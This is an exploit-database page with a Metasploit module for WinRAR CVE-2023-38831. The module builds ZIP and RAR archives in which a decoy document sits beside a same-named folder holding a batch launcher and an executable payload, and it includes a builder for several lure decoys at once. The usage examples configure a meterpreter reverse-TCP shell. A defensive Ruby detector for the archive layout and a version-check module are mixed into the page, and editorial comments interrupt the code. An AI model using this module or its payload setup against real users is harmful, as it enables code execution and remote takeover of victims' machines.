📄 WinRAR 6.22 Malicious ZIP Creation

28 Nov 2025 00:00:00 | Reported by indoushka | Type: packetstorm | Source: packetstorm.news | 181 views

Exploits a logical flaw in WinRAR 6.22 and earlier (CVE-2023-38831): a crafted ZIP archive that pairs a benign-looking file with a folder of the same name causes executable content in that folder to run when the victim opens the benign file from within WinRAR.

Code
=============================================================================================================================================
    | # Title     : WinRAR 6.22 and earlier - Logical Flaw in File Extraction Exploit Module                                                    |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.win-rar.com/                                                                                                    |
    =============================================================================================================================================
    
    POC : 
    
    [+] References : https://packetstorm.news/files/id/177803/ & CVE-2023-38831
    
    
    [+] Summary : 
              
            This module exploits a logical flaw in WinRAR versions before 6.23 (CVE-2023-38831).
            A specially crafted ZIP archive holds a benign-looking file together with a folder of
            the same name. When the user double-clicks the benign file inside WinRAR, the extraction
            logic also processes the contents of that folder, so executable content placed there
            runs although the user only asked to open the benign file.
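The layout the summary describes can be checked mechanically. The following is an added example, not part of the original submission and not the module's code: it hand-builds a stored ZIP with the decoy-plus-same-named-folder layout using only Ruby's standard library, then reads the central directory back and flags any file entry that has a directory entry of the same name holding executable content, which is the triage check a mail gateway or forensic script would want. The entry names and contents are constructed for the example, and the list of "executable" extensions is an assumption.

```ruby
require 'zlib'

# Assumed list of extensions that run when WinRAR hands the file to ShellExecute.
EXEC_EXT = %w[.exe .cmd .bat .com .scr .vbs .js .ps1 .lnk].freeze

# --- minimal stored-ZIP writer (no gems), enough to produce the shape under test ---
def local_header(name, data)
  name = name.b
  data = data.b
  [0x04034b50, 20, 0, 0, 0, 0, Zlib.crc32(data), data.bytesize, data.bytesize,
   name.bytesize, 0].pack('VvvvvvVVVvv') + name + data
end

def central_header(name, data, offset)
  name = name.b
  data = data.b
  ext_attr = name.end_with?('/') ? 0x10 : 0x20   # MS-DOS directory / archive attribute
  [0x02014b50, 20, 20, 0, 0, 0, 0, Zlib.crc32(data), data.bytesize, data.bytesize,
   name.bytesize, 0, 0, 0, 0, ext_attr, offset].pack('VvvvvvvVVVvvvvvVV') + name
end

def build_zip(entries)
  locals = ''.b
  central = ''.b
  entries.each do |name, data|
    central << central_header(name, data, locals.bytesize)  # offset of this local header
    locals << local_header(name, data)
  end
  eocd = [0x06054b50, 0, 0, entries.size, entries.size, central.bytesize,
          locals.bytesize, 0].pack('VvvvvVVv')
  locals + central + eocd
end

# --- central-directory reader: returns the entry names in archive order ---
def list_entries(zip)
  eocd = zip.rindex("PK\x05\x06".b)
  raise 'no end-of-central-directory record' unless eocd
  _sig, _disk, _cd_disk, _here, total, _cd_size, cd_off, _clen = zip[eocd, 22].unpack('VvvvvVVv')
  names = []
  pos = cd_off
  total.times do
    raise 'bad central directory header' unless zip[pos, 4] == "PK\x01\x02".b
    fields = zip[pos, 46].unpack('VvvvvvvVVVvvvvvVV')
    name_len, extra_len, comment_len = fields[10], fields[11], fields[12]
    names << zip[pos + 46, name_len]
    pos += 46 + name_len + extra_len + comment_len
  end
  names
end

# --- the CVE-2023-38831 shape: a file entry and a directory entry with the same
#     name, and executable content inside that directory. Trailing whitespace is
#     stripped before comparing, which also covers the trailing-space spelling of
#     the names reported in public analyses of this CVE.
def cve_2023_38831_hits(names)
  dirs = names.select { |n| n.end_with?('/') }.map { |n| n.chomp('/') }
  files = names.reject { |n| n.end_with?('/') }
  hits = []
  files.each do |decoy|
    twin = dirs.find { |d| d.rstrip == decoy.rstrip }
    next unless twin
    payloads = files.select do |n|
      n.start_with?("#{twin}/") && EXEC_EXT.include?(File.extname(n.rstrip).downcase)
    end
    hits << { decoy: decoy, folder: twin, payloads: payloads } unless payloads.empty?
  end
  hits
end

# Constructed samples (not real malware): the plain layout, the trailing-space
# spelling, and a benign archive that must not be flagged.
SAMPLE_ZIP = build_zip([
  ['document.pdf',              "%PDF-1.4 constructed decoy\n"],
  ['document.pdf/',             ''],
  ['document.pdf/launcher.cmd', "@start \"\" \"%~dp0payload.exe\"\r\n"],
  ['document.pdf/payload.exe',  "MZ stand-in for a PE\n"]
])
SPACED_ZIP = build_zip([
  ['photo.jpg ',                "JFIF constructed decoy\n"],
  ['photo.jpg /',               ''],
  ['photo.jpg /photo.jpg .cmd', "@calc.exe\r\n"]
])
BENIGN_ZIP = build_zip([['report.pdf', "%PDF-1.4\n"], ['images/', ''], ['images/a.jpg', "JFIF\n"]])

if __FILE__ == $PROGRAM_NAME
  [['SAMPLE', SAMPLE_ZIP], ['SPACED', SPACED_ZIP], ['BENIGN', BENIGN_ZIP]].each do |label, zip|
    puts "#{label}: #{cve_2023_38831_hits(list_entries(zip)).inspect}"
  end
end
```

The detector deliberately works from the central directory rather than from extracted files: the collision between a file name and a directory name is the property that makes the archive dangerous, and it is visible before anything is written to disk.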
    	
    [+] POC :  
    
    ---
    
    ##
    # Vulnerability: WinRAR 6.22 and earlier - Logical Flaw in File Extraction
    # Author: indoushka
    # CVE-2023-38831 
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::FILEFORMAT
      include Msf::Exploit::EXE
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'WinRAR CVE-2023-38831 Logical Flaw Exploit',
          'Description'    => %q{
            This module exploits a logical flaw in WinRAR versions before 6.23 (CVE-2023-38831).
            A specially crafted ZIP archive holds a benign-looking file together with a folder of
            the same name. When the user double-clicks the benign file inside WinRAR, the extraction
            logic also processes the contents of that folder, so executable content placed there
            runs although the user only asked to open the benign file.
          },
          'Author'         => [
            'indoushka',  # Metasploit module
            'E1.Coders'   # Original research
          ],
          'License'        => MSF_LICENSE,
          'References'     => [
            ['CVE', '2023-38831'],
            ['URL', 'https://www.rarlab.com/rarnew.htm'],
            ['URL', 'https://news.ycombinator.com/item?id=37135383']
          ],
          'DefaultOptions' => {
            'EXITFUNC' => 'process',
            'DisablePayloadHandler' => false
          },
          'Platform'       => 'win',
          'Arch'           => [ARCH_X86, ARCH_X64],
          'Payload'        => {
            'Space'       => 4096,
            'BadChars'    => "\x00",
            'DisableNops' => true
          },
          'Targets'        => [
            [
          'WinRAR <= 6.22 on Windows (x86/x64)',
              {
                'Platform' => 'win',
                'Arch' => [ARCH_X86, ARCH_X64]
              }
            ]
          ],
          'Privileged'     => false,
          'DisclosureDate' => '2023-08-23',
          'DefaultTarget'  => 0))
    
        register_options([
          OptString.new('FILENAME', [true, 'The output file name (a .rar name selects the RAR 4.x builder, anything else ZIP)', 'exploit.zip']),
          OptString.new('DECOY_NAME', [true, 'Decoy file name', 'document.pdf']),
          OptPath.new('DECOY_FILE', [false, 'Benign document to store under DECOY_NAME (random filler when unset)']),
          OptBool.new('HIDEEXE', [true, 'Hide executable extension', true])
        ])
      end

      def exploit
        # Generate payload executable
        pe_payload = generate_payload_exe

        decoy_name = datastore['DECOY_NAME']

        # The decoy is the file the victim sees and double-clicks, so it has to be
        # benign content rather than a second copy of the payload (which the
        # original builder stored there). Without DECOY_FILE it is random filler
        # that will not open as a real document.
        decoy_content = if datastore['DECOY_FILE']
                          File.binread(datastore['DECOY_FILE'])
                        else
                          Rex::Text.rand_text_alpha(256)
                        end

        # One executable name, generated once, so the launcher script refers to
        # the file that is actually stored next to it.
        exe_basename = "#{Rex::Text.rand_text_alpha(8)}.exe"

        # HIDEEXE is kept from the original option list; neither builder
        # consults it.

        # CVE-2023-38831 is described for ZIP archives, so ZIP is the default.
        # The RAR 4.x builder below is retained and selected only by a .rar
        # output name.
        archive = if File.extname(datastore['FILENAME']).casecmp?('.rar')
                    build_malicious_rar(decoy_name, decoy_content, exe_basename, pe_payload)
                  else
                    create_zip_exploit(decoy_name, decoy_content, exe_basename, pe_payload)
                  end

        file_create(archive)

        print_status("Exploit archive created: #{datastore['FILENAME']}")
        print_status("When victim opens the archive and double-clicks '#{decoy_name}', payload will execute")
      end

      # RAR 4.x variant. The original header builder omitted the leading header
      # CRC and the main archive header and appended a ZIP-style "extra field",
      # so WinRAR would not parse it; this follows the RAR 4.x block layout.
      def build_malicious_rar(decoy_name, decoy_content, exe_basename, pe_payload)
        require 'zlib'
        folder = decoy_name  # a directory is marked by header flags, not by a trailing separator
        script = build_script_content(exe_basename)

        rar = "\x52\x61\x72\x21\x1A\x07\x00".b                      # marker block "Rar!\x1A\x07\x00"
        rar << rar4_block(0x73, 0x0000, "\x00" * 6)                # main archive header (13 bytes)
        rar << build_file_header(decoy_name, decoy_content) << decoy_content
        rar << build_file_header(folder, ''.b, directory: true)    # same-named folder
        rar << build_file_header("#{folder}\\#{Rex::Text.rand_text_alpha(8)}.cmd", script) << script
        rar << build_file_header("#{folder}\\#{exe_basename}", pe_payload) << pe_payload
        rar << rar4_block(0x7B, 0x0000, ''.b)                      # end-of-archive block
        rar
      end

      # Generic RAR 4.x block: HEAD_CRC (low 16 bits of CRC32 over everything
      # after it), HEAD_TYPE, HEAD_FLAGS, HEAD_SIZE, then the type-specific body.
      def rar4_block(type, flags, body)
        head = [type, flags, 7 + body.bytesize].pack('Cvv') + body.b
        [Zlib.crc32(head) & 0xFFFF].pack('v') + head
      end

      # RAR 4.x file header (type 0x74) for a stored entry.
      def build_file_header(filename, data, directory: false)
        name = filename.b
        flags = 0x8000                 # ADD_SIZE (PACK_SIZE) field present, always set on file headers
        flags |= 0xE0 if directory     # all dictionary bits set marks a directory entry

        body = ''.b
        body << [data.bytesize].pack('V')       # PACK_SIZE
        body << [data.bytesize].pack('V')       # UNP_SIZE
        body << [0x02].pack('C')                # HOST_OS: Win32
        body << [Zlib.crc32(data)].pack('V')    # FILE_CRC (the original wrote zeros)

        t = Time.now
        dos_time = ((t.year - 1980) << 25) | (t.month << 21) | (t.day << 16) |
                   (t.hour << 11) | (t.min << 5) | (t.sec / 2)
        body << [dos_time].pack('V')            # FTIME, MS-DOS format

        body << [20].pack('C')                  # UNP_VER: 2.0 is enough for stored data
        body << [0x30].pack('C')                # METHOD: store
        body << [name.bytesize].pack('v')       # NAME_SIZE
        body << [directory ? 0x10 : 0x20].pack('V')  # ATTR: directory or archive attribute
        body << name                            # FILE_NAME (HEAD_SIZE = 32 + NAME_SIZE)
        rar4_block(0x74, flags, body)
      end

      def build_script_content(exe_basename)
        # %~dp0 is the directory the script was extracted to, so the launcher
        # works from whatever temporary folder WinRAR unpacks into.
        script = "@echo off\r\n"
        script << "start \"\" \"%~dp0#{exe_basename}\"\r\n"
        script << "exit\r\n"
        script
      end

      # ZIP builder (rubyzip ships with the framework); this is the default path.
      def create_zip_exploit(decoy_name, decoy_content, exe_basename, pe_payload)
        require 'zip'
        folder_name = "#{decoy_name}/"   # directory entries carry a trailing slash in ZIP
        Zip::OutputStream.write_buffer do |zos|
          zos.put_next_entry(decoy_name)                   # benign file the victim double-clicks
          zos.write(decoy_content)
          zos.put_next_entry(folder_name)                  # folder with the same name
          zos.put_next_entry("#{folder_name}#{Rex::Text.rand_text_alpha(8)}.cmd")
          zos.write(build_script_content(exe_basename))
          zos.put_next_entry("#{folder_name}#{exe_basename}")
          zos.write(pe_payload)
        end.string
      end

      # Advanced: one archive carrying several decoys, each paired with its own
      # same-named folder and launcher.
      def create_advanced_exploit(pe_payload)
        require 'zip'
        print_status("Creating advanced WinRAR exploit...")
        decoys = %w[document.pdf invoice.docx photo.jpg spreadsheet.xlsx]
        Zip::OutputStream.write_buffer do |zos|
          decoys.each do |decoy|
            zos.put_next_entry(decoy)
            zos.write(Rex::Text.rand_text_alpha(256))  # filler; substitute real documents for a convincing lure
            folder_name = "#{decoy}/"
            zos.put_next_entry(folder_name)
            zos.put_next_entry("#{folder_name}payload.exe")
            zos.write(pe_payload)
            zos.put_next_entry("#{folder_name}run.cmd")
            zos.write(build_script_content('payload.exe'))
          end
        end.string
      end
    
    end
    
    
    
    ######### Auxiliary module for WinRAR version checking ############
    #
    # Keep this class in its own module file. Ruby raises "superclass mismatch
    # for class MetasploitModule" when a second MetasploitModule with a
    # different parent is defined in the same file, and the framework loads
    # exactly one module per file anyway.
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Scanner   # supplies RHOSTS and the per-host run loop
    
      # Every release before 6.23 is affected (the vendor fixed it in 6.23), so
      # a version comparison replaces the incomplete hard-coded version list.
      FIXED_VERSION = Rex::Version.new('6.23')
    
      def initialize
        super(
          'Name'        => 'WinRAR CVE-2023-38831 Version Check',
          'Description' => %q{
            Reports whether a WinRAR version is affected by CVE-2023-38831.
            Remote version discovery (for example reading the installed WinRAR.exe
            file version over SMB) is not implemented; the SMB options are kept as
            the intended interface for that step.
          },
          'Author'      => ['indoushka'],
          'License'     => MSF_LICENSE,
          'References'  => [
            ['CVE', '2023-38831']
          ]
        )
    
        register_options([
          OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
          OptString.new('SMBUSER', [false, 'The username to authenticate as']),
          OptString.new('SMBPASS', [false, 'The password for the specified username']),
          OptString.new('SMBDOMAIN', [false, 'The Windows domain to use for authentication']),
          OptString.new('WINRAR_VERSION', [false, 'Known WinRAR version to evaluate while remote discovery is unavailable'])
        ])
      end
    
      def vulnerable_version?(version)
        Rex::Version.new(version) < FIXED_VERSION
      end
    
      def run_host(ip)
        version = datastore['WINRAR_VERSION']
        if version.nil? || version.empty?
          print_status("#{ip}: remote WinRAR version discovery is not implemented; set WINRAR_VERSION")
          return
        end
    
        if vulnerable_version?(version)
          print_good("#{ip}: WinRAR #{version} is vulnerable to CVE-2023-38831 (fixed in 6.23)")
        else
          print_status("#{ip}: WinRAR #{version} is not affected")
        end
      end
    end
    
    
    ################ Usage Examples:
    
    # Generate exploit with default settings
    use exploit/windows/fileformat/winrar_cve_2023_38831
    set payload windows/meterpreter/reverse_tcp
    set LHOST 192.168.1.100
    set LPORT 4444
    exploit
    
    # Generate with custom decoy name
    
    set DECOY_NAME invoice.pdf
    exploit
    
    # Generate without hiding executable
    
    set HIDEEXE false
    exploit
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

Vulners AI Score: 7.6 (High risk) | CVSS 3.1: 7.8 | EPSS: 0.97798